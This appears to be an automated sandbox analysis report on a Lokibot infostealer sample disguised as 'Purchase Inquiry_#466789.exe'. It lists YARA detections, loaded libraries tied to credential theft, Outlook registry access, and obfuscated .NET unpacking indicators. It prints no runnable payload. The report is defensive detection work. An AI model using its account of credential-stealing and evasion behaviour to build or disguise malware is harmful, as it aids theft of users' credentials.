                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: Process Memory Space: Purchase Inquiry_#466789.exe PID: 1880, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: Process Memory Space: Purchase Inquiry_#466789.exe PID: 7244, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: Purchase Inquiry_#466789.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, OLFvd2ig8Hgk5m8cI7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, OoLUaOdU4hOfgrkdvf.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, OoLUaOdU4hOfgrkdvf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, OoLUaOdU4hOfgrkdvf.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.Purchase Inquiry_#466789.exe.5890000.10.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 0.2.Purchase Inquiry_#466789.exe.3084a9c.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 0.2.Purchase Inquiry_#466789.exe.2d4f3f0.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 0.2.Purchase Inquiry_#466789.exe.2d5f408.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@0/1
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,2_2_0040434D
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Inquiry_#466789.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeMutant created: NULL
                  Source: Purchase Inquiry_#466789.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Purchase Inquiry_#466789.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Purchase Inquiry_#466789.exeReversingLabs: Detection: 71%
                  Source: Purchase Inquiry_#466789.exeVirustotal: Detection: 43%
                  Source: unknownProcess created: C:\Users\user\Desktop\Purchase Inquiry_#466789.exe "C:\Users\user\Desktop\Purchase Inquiry_#466789.exe"
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess created: C:\Users\user\Desktop\Purchase Inquiry_#466789.exe "C:\Users\user\Desktop\Purchase Inquiry_#466789.exe"
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess created: C:\Users\user\Desktop\Purchase Inquiry_#466789.exe "C:\Users\user\Desktop\Purchase Inquiry_#466789.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                  Source: Purchase Inquiry_#466789.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Purchase Inquiry_#466789.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: Purchase Inquiry_#466789.exe, GameOfLife.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: Purchase Inquiry_#466789.exe, GameOfLife.cs.Net Code: InitializeComponent contains xor as well as GetObject
                  Source: 0.2.Purchase Inquiry_#466789.exe.5560000.9.raw.unpack, LoginForm.cs.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, OoLUaOdU4hOfgrkdvf.cs.Net Code: UJcxTPXvYDR8bgxvGkm System.Reflection.Assembly.Load(byte[])
                  Yara detected aPLib compressed binary
                  Source: Yara matchFile source: 2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Purchase Inquiry_#466789.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_#466789.exe PID: 1880, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_#466789.exe PID: 7244, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 0_2_05905B08 push esp; ret 0_2_05905B09
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
                  Source: Purchase Inquiry_#466789.exeStatic PE information: section name: .text entropy: 7.973562930298665
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, OLFvd2ig8Hgk5m8cI7.csHigh entropy of concatenated method names: 'fOs1BX6XBu', 'nEm1g0AFSf', 'owB1Fc7xO6', 'R6n1E7aDAW', 'kqc1PNN84U', 'aZx1INBVsd', 'xJF1DKROYO', 'HNN1Jxb2kC', 'LfK1ULlB6l', 'gtI1N6kwx4'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, l6mOBIJ4xxrLHxvdQO.csHigh entropy of concatenated method names: 'wnMruPd9KQ', 'Hy6r1Kfyer', 'dJBra9MJod', 'OnIr6tUmK8', 'OMGrxI3Sqt', 'mDir7m5dhq', 'My6rdtIRyB', 'K4brYZXII9', 'wudrjFx847', 'ooxrncdtcg'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, EBb6qXXWSJFaYcO6I5.csHigh entropy of concatenated method names: 'UeVZ7LFvd2', 'R8HZdgk5m8', 'fknZj4Iisw', 'z9LZnjPK1r', 'm3HZ5uJoVk', 'WaOZTsT4gD', 'ktOQGXrodfbtBcdVfr', 'hNLLs95KV02Te2Qecv', 'PNhZZwAQYe', 'zFKZhiPpZj'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, EmoVC31Qqtw3RWZblJ.csHigh entropy of concatenated method names: 'Dispose', 'Hy1ZU7Y085', 'MVSMH20PpR', 'X4DbbjGF0X', 'RY6ZNmOBI4', 'ixrZzLHxvd', 'ProcessDialogKey', 'LOtM2UXXFH', 'Td9MZTSZbT', 'MOfMM0hRck'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, yZ2WylaYVyLvdkB0nK.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ouIMUpiwcl', 'upWMNOILBN', 'Y8QMzw5XbK', 'NeTh2HJ26g', 'pnChZI48jx', 'UdohMXA0TJ', 'BvMhh1dZVW', 'onE4bLXjyKkEq1GoYS7'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, eVkDaOGsT4gDghabE5.csHigh entropy of concatenated method names: 'nW3xoD7U8e', 'W3ox1WEiHG', 'ymqx6kdX6W', 'B6nx7Vohw3', 'W18xdyCpR1', 'QWv6PrteuR', 'GG46ID8fRG', 'w7u6Dlf1i9', 'qUr6JXGM7O', 'yl06UEudA5'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, wUXXFHUEd9TSZbTpOf.csHigh entropy of concatenated method names: 'kStrGhLQih', 'pR8rHshxlN', 'vKdrC5m5yQ', 'TM9r9LJ5SS', 'sL4rB3jxX3', 'Jnur3ZPuLL', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, nSVQv8ZhCKGKtFNFmKl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fiJvBCaght', 'YvIvgEgBys', 'fVbvFsRkMD', 'UScvElkMfq', 'sNKvPmFRTi', 'SjvvInNR38', 'UtUvDjHMq5'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, gw0cUvRmauVJAXiIaS.csHigh entropy of concatenated method names: 'lH4Ai8914T', 'Gb2ASl4BfC', 'eBBAGVJIAe', 'NxTAH2AfXn', 'MdlA9Aweml', 'SMSA3y1qK8', 'W7FAQMklk9', 'dmIAwVgVCj', 'vaxAsDB81e', 'xlkAVRGDes'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, bNwtACpOM0sUdZ5Ln8.csHigh entropy of concatenated method names: 'Q0e7ybITUI', 'DNE7W591td', 'OrE709xu2U', 'jHr7mXBBao', 'kBF74ntLkr', 'fxO7lBZHwX', 'KRf7LAVgYD', 'WUF7imp13I', 'e7p7Sg1mHN', 'LRW7qUjGR0'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, j2th5uSkn4Iisw09Lj.csHigh entropy of concatenated method names: 'FeIamr0rDG', 'S4kalGmnbO', 'zdMaiG706n', 'ALwaSKRe7H', 'QVka5l6Je3', 'i3yaTDERfM', 'PnLakK1a9q', 'Dj6arMrN3x', 'NdKacKlk4L', 'tAWavuf0bF'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, UK1rUwqLTKnuLj3HuJ.csHigh entropy of concatenated method names: 'uAc643O9cl', 'aWL6L0ZqT5', 'L6baCcYoJY', 'hXFa9eOvEk', 'Mema31AMFV', 'qhXafRuJjF', 'G91aQd4FBC', 'mvcaweP2G5', 'jgTapVZtif', 'tNDasiJmvv'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, CaFGxrQY3AuEw44ZUA.csHigh entropy of concatenated method names: 'VoC7u9yqnt', 'L2x7aZ6Wv6', 'wxu7x8HS4h', 'rWCxN0ZPdq', 'uidxzFYE2y', 'p0l72kARYr', 'qJU7Z9UsP7', 'LXw7MYim5P', 'i6Y7hrSHnX', 'qBt7Xs2wI0'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, zhRckwNhMqUD30Ne1A.csHigh entropy of concatenated method names: 'WG6cZ8ta21', 'jPjch6rkF6', 'FWicXBgcd3', 'XVpcu4cvYh', 'gFtc16t0KB', 'aStc6KLERf', 'PwWcx2QCpF', 'tChrDGEEqB', 'kwgrJSfPYh', 'SKNrUW5cF8'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, uaUDLh9dnlLL11tqCA.csHigh entropy of concatenated method names: 'n6Txt5hYKc', 'BKSxyqqdc1', 'v7Cx0QqUpe', 'qwwxmPMH9a', 'YhVxlUxv1J', 'EXixLdyIpB', 'zekxSbbYKD', 'opGxqTyHjF', 'LVXMRZCfKutBKFK2W9S', 'NNmpTSC69CNiHQJmL4o'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, BZTdQCIyn5YGQLtgEW.csHigh entropy of concatenated method names: 'bKpkJuedZC', 'rOYkNZfrgA', 'WQTr2Vkn8J', 'VlOrZIaGMr', 'K1okVdOets', 'VMGkKM8JHT', 'XWUkRh7pJq', 'ttRkBh8qOE', 'wufkgiT79F', 'TeQkF7BIkC'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, v8uMxozMvWXVJucrE1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SELcAhWyVY', 'PItc5uABKX', 'EoucT2J89q', 'U0HckPpcLh', 'aVncr7U6On', 'vG8ccktWsm', 'ylkcvWHu5a'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, QnA6VFMKM1TmhpPpLW.csHigh entropy of concatenated method names: 'Vnn0S5B1E', 'FatmdoPdS', 'cJ4lxsUGX', 'twSLNt2p4', 'HJ5SB8KDU', 'gBoqVSE1i', 'JJ6VIv42FO352A9EIP', 'vNVIP0iPT1oMNpALiD', 'x2BrmwNe3', 'Wgyvw6eXS'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, HeB1C8Z2hPyiUZn55Nq.csHigh entropy of concatenated method names: 'mVAcyAsW2R', 'MW9cWPlClY', 'eGnc0tTFe9', 'QrdcmH67Xr', 'Jpxc45PDca', 'hA1clVuQBq', 'EFIcL3Eb14', 'qxgciyn6GS', 'gPncScWnf8', 'vBGcqOfgWq'
                  Source: 0.2.Purchase Inquiry_#466789.exe.3fbc460.7.raw.unpack, OoLUaOdU4hOfgrkdvf.csHigh entropy of concatenated method names: 'lkOhokVqxM', 'PwChuowwMD', 'epLh1WapYR', 'xYUhah7tBH', 'OFgh65oS7M', 'hFRhxgdpZa', 'guKh7ZkaBw', 'H7chdsR25i', 'FZThY2vfeq', 'cemhjBl5tu'
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
